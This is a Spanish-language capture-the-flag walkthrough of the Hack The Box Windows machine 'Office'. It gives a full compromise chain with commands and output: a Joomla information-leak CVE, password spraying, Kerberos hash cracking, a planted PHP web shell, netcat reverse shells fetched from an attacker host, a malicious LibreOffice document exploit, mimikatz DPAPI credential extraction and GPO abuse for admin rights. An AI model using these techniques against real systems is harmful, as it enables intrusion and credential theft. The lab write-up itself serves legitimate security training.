Office
OS: Windows
Dificultad: Difícil
Puntos: 40
Nmap
ports=$(nmap -p- --min-rate=5000 -T4 10.10.11.3 | grep ^[0-9] | cut -d '/' -f 1 | tr '\n' ',' | sed s/,$//)nmap -p $ports -sC -sV 10.10.11.3Nmap scan report for 10.10.11.3
Host is up (0.078s latency).
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
80/tcp open http Apache httpd 2.4.56 ((Win64) OpenSSL/1.1.1t PHP/8.0.28)
|_http-generator: Joomla! - Open Source Content Management
|_http-server-header: Apache/2.4.56 (Win64) OpenSSL/1.1.1t PHP/8.0.28
| http-robots.txt: 16 disallowed entries (15 shown)
| /joomla/administrator/ /administrator/ /api/ /bin/
| /cache/ /cli/ /components/ /includes/ /installation/
|_/language/ /layouts/ /libraries/ /logs/ /modules/ /plugins/
|_http-title: Home
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2024-06-08 00:30:15Z)
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: office.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2024-06-08T00:31:51+00:00; +7h59m56s from scanner time.
| ssl-cert: Subject: commonName=DC.office.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:DC.office.htb
| Not valid before: 2023-05-10T12:36:58
|_Not valid after: 2024-05-09T12:36:58
443/tcp open ssl/http Apache httpd 2.4.56 (OpenSSL/1.1.1t PHP/8.0.28)
|_http-server-header: Apache/2.4.56 (Win64) OpenSSL/1.1.1t PHP/8.0.28
| ssl-cert: Subject: commonName=localhost
| Not valid before: 2009-11-10T23:48:47
|_Not valid after: 2019-11-08T23:48:47
|_ssl-date: TLS randomness does not represent time
|_http-title: 403 Forbidden
| tls-alpn:
|_ http/1.1
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: office.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=DC.office.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:DC.office.htb
| Not valid before: 2023-05-10T12:36:58
|_Not valid after: 2024-05-09T12:36:58
|_ssl-date: 2024-06-08T00:31:51+00:00; +7h59m56s from scanner time.
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: office.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=DC.office.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:DC.office.htb
| Not valid before: 2023-05-10T12:36:58
|_Not valid after: 2024-05-09T12:36:58
|_ssl-date: 2024-06-08T00:31:51+00:00; +7h59m56s from scanner time.
3269/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: office.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2024-06-08T00:31:51+00:00; +7h59m56s from scanner time.
| ssl-cert: Subject: commonName=DC.office.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:DC.office.htb
| Not valid before: 2023-05-10T12:36:58
|_Not valid after: 2024-05-09T12:36:58
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
9389/tcp open mc-nmf .NET Message Framing
49664/tcp open msrpc Microsoft Windows RPC
49667/tcp open msrpc Microsoft Windows RPC
54080/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
54086/tcp open msrpc Microsoft Windows RPC
54112/tcp open msrpc Microsoft Windows RPC
63359/tcp open msrpc Microsoft Windows RPC
Service Info: Hosts: DC, www.example.com; OS: Windows; CPE: cpe:/o:microsoft:windowsEnumeration
Si accedemos al portal web en el puerto 80 vemos que esta utilizando Joomla asi como tambien lo menciona el escaneo de nmap.
Enumeramos la version que se esta utilizando.
curl http://10.10.11.3/administrator/manifests/files/joomla.xml | grep version<?xml version="1.0" encoding="UTF-8"?>
<license>GNU General Public License version 2 or later; see LICENSE.txt</license>
<version>4.2.7</version>La version utilzada es 4.2.7 la cual tiene un CVE registrado API Unauthenticated Information Disclosure (CVE-2023-23752). Consultando la siguiente URL obtenemos un password.
curl 'http://10.10.11.3/api/index.php/v1/config/application?public=true'{"type":"application","id":"224","attributes":{"password":"H0lOgrams4reTakIng0Ver754!","id":224}Kerbrute Enum
Tambien enumeramos usuarios con kerbrute.
/opt/windows/kerbrute userenum -d office.htb --dc 10.10.11.3 /usr/share/seclists/Usernames/xato-net-10-million-usernames.txt2024/06/07 12:56:03 > [+] VALID USERNAME: administrator@office.htb
2024/06/07 12:57:51 > [+] VALID USERNAME: Administrator@office.htb
2024/06/07 12:58:49 > [+] VALID USERNAME: ewhite@office.htb
2024/06/07 12:58:49 > [+] VALID USERNAME: etower@office.htb
2024/06/07 12:58:49 > [+] VALID USERNAME: dwolfe@office.htb
2024/06/07 12:58:50 > [+] VALID USERNAME: dmichael@office.htb
2024/06/07 12:58:50 > [+] VALID USERNAME: dlanor@office.htbCon esos usuarios hacemos password spray usando crackmapexec.
crackmapexec smb 10.10.11.3 -u users.txt -p 'H0lOgrams4reTakIng0Ver754!'SMB 10.10.11.3 445 DC [*] Windows Server 2022 Build 20348 (name:DC) (domain:office.htb) (signing:True) (SMBv1:False)
SMB 10.10.11.3 445 DC [-] office.htb\ewhite:H0lOgrams4reTakIng0Ver754! STATUS_LOGON_FAILURE
SMB 10.10.11.3 445 DC [-] office.htb\etower:H0lOgrams4reTakIng0Ver754! STATUS_LOGON_FAILURE
SMB 10.10.11.3 445 DC [+] office.htb\dwolfe:H0lOgrams4reTakIng0Ver754!El password funciona con el usario dwolfe.
dwolfe : H0lOgrams4reTakIng0Ver754!SMB Enum
Utilizando las credenciales vemos que hay un directorio compartido.
smbclient -L 10.10.11.3 -U dwolfePassword for [WORKGROUP\dwolfe]:
Sharename Type Comment
--------- ---- -------
ADMIN$ Disk Remote Admin
C$ Disk Default share
IPC$ IPC Remote IPC
NETLOGON Disk Logon server share
SOC Analysis Disk
SYSVOL Disk Logon server shareAccediendo al directorio hay un archivo pcap que podemos descargar.
smbclient '//10.10.11.3/SOC Analysis' -U dwolfesmb: \> dir
. D 0 Wed May 10 14:52:24 2023
.. DHS 0 Wed Feb 14 05:18:31 2024
Latest-System-Dump-8fbc124d.pcap A 1372860 Sun May 7 20:59:00 2023
6265599 blocks of size 4096. 1210820 blocks available
smb: \> get Latest-System-Dump-8fbc124d.pcap
getting file \Latest-System-Dump-8fbc124d.pcap of size 1372860 as Latest-System-Dump-8fbc124d.pcap (635.7 KiloBytes/sec) (average 635.7 KiloBytes/sec)Wireshark Analysis
Despues de analizar el archivo encontramos un par de paquetes kerberos que contiene un hash pre-auth que posible crackearlo.
Nos ayudamos de este blog que nos explica el metodo.
https://vbscrub.com/2020/02/27/getting-passwords-from-kerberos-pre-authentication-packets/
Copiamos la informacion el hash.
$krb5pa$18$tstark$office.htb$a16f4806da05760af63c566d566f071c5bb35d0a414459417613a9d67932a6735704d0832767af226aaa7360338a34746a00a3765386f5fcCrack hash
Utilizando hashcat obtenemos el password.
hashcat -m 19900 hash.txt /usr/share/wordlists/rockyou.txtDictionary cache built:
* Filename..: /usr/share/wordlists/rockyou.txt
* Passwords.: 14344392
* Bytes.....: 139921507
* Keyspace..: 14344385
* Runtime...: 3 secs
$krb5pa$18$tstark$office.htb$a16f4806da05760af63c566d566f071c5bb35d0a414459417613a9d67932a6735704d0832767af226aaa7360338a34746a00a3765386f5fc:playboy69Joomla RCE
Con esas credenciales podemos acceder al joomla.
administrator : playboy69
Podemos obtener rce de la siguiente forma.
https://book.hacktricks.xyz/network-services-pentesting/pentesting-web/joomla#rce
Navegamos a la siguiente URL.
http://10.10.11.3/administrator/index.php?option=com_templates&view=template&id=223&file=Ly9lcnJvci5waHA%3D&isMedia=0Modificamos el archivo error.php y guardamos.
system($_GET['cmd']);
Ahora consultamos nuestra webshell.
http://10.10.11.3/templates/cassiopeia/error.php?cmd=whoami
Revershe shell
Ejecutamos los siguientes comando para sacar reverse shell.
mkdir c:\temp
curl 10.10.14.132/nc64.exe -o c:\temp\nc.exe
c:\temp\nc.exe -e cmd.exe 10.10.14.132 1234┌──(root㉿kali)-[~/htb/Box/Office]
└─# nc -lvnp 1234
listening on [any] 1234 ...
connect to [10.10.14.132] from (UNKNOWN) [10.10.11.3] 51769
Microsoft Windows [Version 10.0.20348.2322]
(c) Microsoft Corporation. All rights reserved.
C:\xampp\htdocs\joomla\templates\cassiopeia>whoami
whoami
office\web_accountLateral Movement
Se encuentra un puerto local abierto 8083.
netstat -ano TCP 0.0.0.0:5985 0.0.0.0:0 LISTENING 4
TCP 0.0.0.0:8083 0.0.0.0:0 LISTENING 1032
TCP 0.0.0.0:9389 0.0.0.0:0 LISTENING 2628El puerto nos muestra una pagina web.
c:\>curl localhost:8083<!doctype html>
<html lang="en">
<head>
<!-- Required meta tags -->
<meta charset="utf-8">
<meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">
<!-- Bootstrap CSS -->
<link rel="stylesheet" href="css/squarely.css">
<!--common.css -->
<link rel="stylesheet" href="css/common.css">
<title>Holography Industries</title>
</head>
<body>Los archivos de esta pagina web se encuentran en la siguiente ruta.
dir c:\xampp\htdocs\internalEn el codigo resume.php vemos que almacena archivos odt en el directorio applications.
$extension = strtolower(end($ext));
$filesallowed = array('docm','docx','doc','odt');
if(in_array($extension,$filesallowed)){
if ($fileerr === 0){
if ($filesize < 5242880){
$ff = "$rewritefn.$extension";
$loc = "applications/".$ff;
if(move_uploaded_file($filetmp,$loc))
{
// upload successful
$notifi="<span class=notifi>✔ Upload Successful!</span><hr/><style>
button, input , select, option, h3{
display:none;
}
</style>";
} else {LibreOffice (CVE-2023-2255)
Tambien en los programas del sistema encontramos LibreOffice instalado en su version 5.2.
C:\> type "Program Files\Libre Office 5\readmes\readme_en-US.txt"
======================================================================
We hope you enjoy working with the new LibreOffice 5.2 and will join us online.
======================================================================La version de LibreOffice es vulnerable al siguiente exploit.
https://github.com/elweth-sec/CVE-2023-2255
Por lo tanto pdodemos explotar la vuln creando nuestro archivo y dejandolo en el directorio applications.
┌──(root㉿kali)-[~/htb/Box/Office/CVE-2023-2255]
└─# python3 CVE-2023-2255.py --cmd "c:\temp\nc.exe -e cmd.exe 10.10.14.132 4444" --output 'doom.odt'
File doom.odt has been created !Descargamos nuestro archivo.
curl 10.10.14.132/doom.odt -o doom.odtc:\xampp\htdocs\internal\applications>curl 10.10.14.132/doom.odt -o doom.odt
curl 10.10.14.132/doom.odt -o doom.odt
% Total % Received % Xferd Average Speed Time Time Time Current
Dload Upload Total Spent Left Speed
100 30529 100 30529 0 0 121k 0 --:--:-- --:--:-- --:--:-- 121k
c:\xampp\htdocs\internal\applications>dir
dir
Volume in drive C has no label.
Volume Serial Number is C626-9388
Directory of c:\xampp\htdocs\internal\applications
06/07/2024 08:33 PM <DIR> .
01/30/2024 09:39 AM <DIR> ..
06/07/2024 08:33 PM 30,529 doom.odt
1 File(s) 30,529 bytes
2 Dir(s) 4,918,906,880 bytes freeEsperamos un momento y obtenemos nuestra reverse shell.
┌──(root㉿kali)-[~/htb/Box/Office]
└─# nc -lvnp 4444
listening on [any] 4444 ...
connect to [10.10.14.132] from (UNKNOWN) [10.10.11.3] 51999
Microsoft Windows [Version 10.0.20348.2322]
(c) Microsoft Corporation. All rights reserved.
C:\Program Files\LibreOffice 5\program>whoami
whoami
office\ppottsPrivilege Escalation
Vemos que hay credenciales almacenadas.
Get-ChildItem -Hidden C:\Users\PPotts\AppData\Roaming\Microsoft\Credentials\ Directory: C:\Users\PPotts\AppData\Roaming\Microsoft\Credentials
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a-hs- 5/9/2023 2:08 PM 358 18A1927A997A794B65E9849883AC3F3E
-a-hs- 5/9/2023 4:03 PM 398 84F1CAEEBF466550F4967858F9353FB4
-a-hs- 1/18/2024 11:53 AM 374 E76CCA3670CD9BB98DF79E0A8D176F1ETambien localizamos la master keys.
dir C:\Users\PPotts\AppData\Roaming\Microsoft\Protect Directory: C:\Users\PPotts\AppData\Roaming\Microsoft\Protect
Mode LastWriteTime Length Name
---- ------------- ------ ----
d---s- 6/7/2024 5:02 AM S-1-5-21-1199398058-4196589450-691661856-1107Get-ChildItem -Hidden C:\Users\PPotts\AppData\Roaming\Microsoft\Protect\S-1-5-21-1199398058-4196589450-691661856-1107\ Directory: C:\Users\PPotts\AppData\Roaming\Microsoft\Protect\S-1-5-21-1199398058-4196589450-691661856-1107
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a-hs- 1/17/2024 3:43 PM 740 10811601-0fa9-43c2-97e5-9bef8471fc7d
-a-hs- 5/2/2023 4:13 PM 740 191d3f9d-7959-4b4d-a520-a444853c47eb
-a-hs- 5/2/2023 4:13 PM 900 BK-OFFICE
-a-hs- 6/7/2024 5:02 AM 740 da923a1f-5364-4062-806c-9553f2d997e6
-a-hs- 6/7/2024 5:02 AM 24 PreferredUtilizando el siguiente recurso podemos extraer passwords.
DPAPI Credentials
Para acceder a esas credenciales utilizaremos mimikatz.
c:\temp>curl 10.10.14.132/mimikatz.exe -o mimikatz.exe
curl 10.10.14.132/mimikatz.exe -o mimikatz.exe
% Total % Received % Xferd Average Speed Time Time Time Current
Dload Upload Total Spent Left Speed
100 1220k 100 1220k 0 0 859k 0 0:00:01 0:00:01 --:--:-- 859kmimikatz # dpapi::cred /in:C:\Users\PPotts\AppData\Roaming\Microsoft\credentials\84F1CAEEBF466550F4967858F9353FB4
**BLOB**
dwVersion : 00000001 - 1
guidProvider : {df9d8cd0-1501-11d1-8c7a-00c04fc297eb}
dwMasterKeyVersion : 00000001 - 1
guidMasterKey : {191d3f9d-7959-4b4d-a520-a444853c47eb}
dwFlags : 20000000 - 536870912 (system ; )
dwDescriptionLen : 0000003a - 58
szDescription : Enterprise Credential Data
algCrypt : 00006603 - 26115 (CALG_3DES)
dwAlgCryptLen : 000000c0 - 192
dwSaltLen : 00000010 - 16
pbSalt : 649c4466d5d647dd2c595f4e43fb7e1d
dwHmacKeyLen : 00000000 - 0
pbHmackKey :
algHash : 00008004 - 32772 (CALG_SHA1)
dwAlgHashLen : 000000a0 - 160
dwHmac2KeyLen : 00000010 - 16
pbHmack2Key : 32e88dfd1927fdef0ede5abf2c024e3a
dwDataLen : 000000c0 - 192
pbData : f73b168ecbad599e5ca202cf9ff719ace31cc92423a28aff5838d7063de5cccd4ca86bfb2950391284b26a34b0eff2dbc9799bdd726df9fad9cb284bacd7f1ccbba0fe140ac16264896a810e80cac3b68f82c80347c4deaf682c2f4d3be1de025f0a68988fa9d633de943f7b809f35a141149ac748bb415990fb6ea95ef49bd561eb39358d1092aef3bbcc7d5f5f20bab8d3e395350c711d39dbe7c29d49a5328975aa6fd5267b39cf22ed1f9b933e2b8145d66a5a370dcf76de2acdf549fc97
dwSignLen : 00000014 - 20
pbSign : 21bfb22ca38e0a802e38065458cecef00b450976Extraemos y desciframos la masterkey.
dpapi::masterkey /in:C:\Users\PPotts\appdata\roaming\microsoft\protect\S-1-5-21-1199398058-4196589450-691661856-1107\191d3f9d-7959-4b4d-a520-a444853c47eb /rpcAuto SID from path seems to be: S-1-5-21-1199398058-4196589450-691661856-1107
[domainkey] with RPC
[DC] 'office.htb' will be the domain
[DC] 'DC.office.htb' will be the DC server
key : 87eedae4c65e0db47fcbc3e7e337c4cce621157863702adc224caf2eedcfbdbaadde99ec95413e18b0965dcac70344ed9848cd04f3b9491c336c4bde4d1d8166
sha1: 85285eb368befb1670633b05ce58ca4d75c73c77Extraemos el password con la masterkey.
dpapi::cred /in:"C:\Users\PPotts\AppData\Roaming\Microsoft\Credentials\84F1CAEEBF466550F4967858F9353FB4" /masterkey:87eedae4c65e0db47fcbc3e7e337c4cce621157863702adc224caf2eedcfbdbaadde99ec95413e18b0965dcac70344ed9848cd04f3b9491c336c4bde4d1d8166 Type : 00000002 - 2 - domain_password
Flags : 00000000 - 0
LastWritten : 5/9/2023 11:03:21 PM
unkFlagsOrSize : 00000018 - 24
Persist : 00000003 - 3 - enterprise
AttributeCount : 00000000 - 0
unk0 : 00000000 - 0
unk1 : 00000000 - 0
TargetName : Domain:interactive=OFFICE\HHogan
UnkData : (null)
Comment : (null)
TargetAlias : (null)
UserName : OFFICE\HHogan
CredentialBlob : H4ppyFtW183#
Attributes : 0Con esas credenciales nos conectamos por winrm.
┌──(root㉿kali)-[~/htb/Box/Office]
└─# evil-winrm -i 10.10.11.3 -u hhogan -p 'H4ppyFtW183#'
Evil-WinRM shell v3.5
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\HHogan\Documents> whoami
office\hhogan
*Evil-WinRM* PS C:\Users\HHogan\Documents>Este usuario pertenece al grupo GPO Managers.
*Evil-WinRM* PS C:\Users\HHogan\Documents> net user hhogan
User name HHogan
Full Name
Comment
User's comment
Country/region code 000 (System Default)
Account active Yes
Account expires Never
Password last set 5/6/2023 11:59:34 AM
Password expires Never
Password changeable 5/7/2023 11:59:34 AM
Password required Yes
User may change password Yes
Workstations allowed All
Logon script
User profile
Home directory
Last logon 5/10/2023 5:30:58 AM
Logon hours allowed All
Local Group Memberships *Remote Management Use
Global Group memberships *Domain Users *GPO Managers
The command completed successfully.SharpGPOAbuse - Abuse GPO
Podemos abusar de estre grupo con la herramienta SharpGPOAbuse.
*Evil-WinRM* PS C:\temp> curl 10.10.14.132/SharpGPOAbuse.exe -o SharpGPOAbuse.exe
*Evil-WinRM* PS C:\temp> dir
Directory: C:\temp
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 6/7/2024 8:55 PM 1250056 mimikatz.exe
-a---- 6/7/2024 7:53 PM 45272 nc.exe
-a---- 6/7/2024 9:28 PM 80896 SharpGPOAbuse.exeCreamos una politica.
*Evil-WinRM* PS C:\temp> .\SharpGPOAbuse.exe --AddLocalAdmin --UserAccount HHogan --GPOName "Default Domain Policy"
[+] Domain = office.htb
[+] Domain Controller = DC.office.htb
[+] Distinguished Name = CN=Policies,CN=System,DC=office,DC=htb
[+] SID Value of HHogan = S-1-5-21-1199398058-4196589450-691661856-1108
[+] GUID of "Default Domain Policy" is: {31B2F340-016D-11D2-945F-00C04FB984F9}
[+] File exists: \\office.htb\SysVol\office.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\Machine\Microsoft\Windows NT\SecEdit\GptTmpl.inf
[+] The GPO does not specify any group memberships.
[+] versionNumber attribute changed successfully
[+] The version number in GPT.ini was increased successfully.
[+] The GPO was modified to include a new local admin. Wait for the GPO refresh cycle.
[+] Done!Actualizamos las politicas.
*Evil-WinRM* PS C:\temp> gpupdate /force
Updating policy...
Computer Policy update has completed successfully.
User Policy update has completed successfully.Ahora somos administradores.
*Evil-WinRM* PS C:\temp> net user hhogan
User name HHogan
Full Name
Comment
User's comment
Country/region code 000 (System Default)
Account active Yes
Account expires Never
Password last set 5/6/2023 11:59:34 AM
Password expires Never
Password changeable 5/7/2023 11:59:34 AM
Password required Yes
User may change password Yes
Workstations allowed All
Logon script
User profile
Home directory
Last logon 5/10/2023 5:30:58 AM
Logon hours allowed All
Local Group Memberships *Administrators *Remote Management Use
Global Group memberships *Domain Users *GPO Managers
The command completed successfully.Cerramos la sesion y nos conectamos otra vez para obtener las flags.
*Evil-WinRM* PS C:\users\Administrator\desktop> type root.txt
ec424b2bbacea5d3aa115ad4438a84f3
*Evil-WinRM* PS C:\users\Administrator\desktop> type c:\users\tstark\desktop\user.txt
d05e09504294d1337a0824ef8bef2898
*Evil-WinRM* PS C:\users\Administrator\desktop>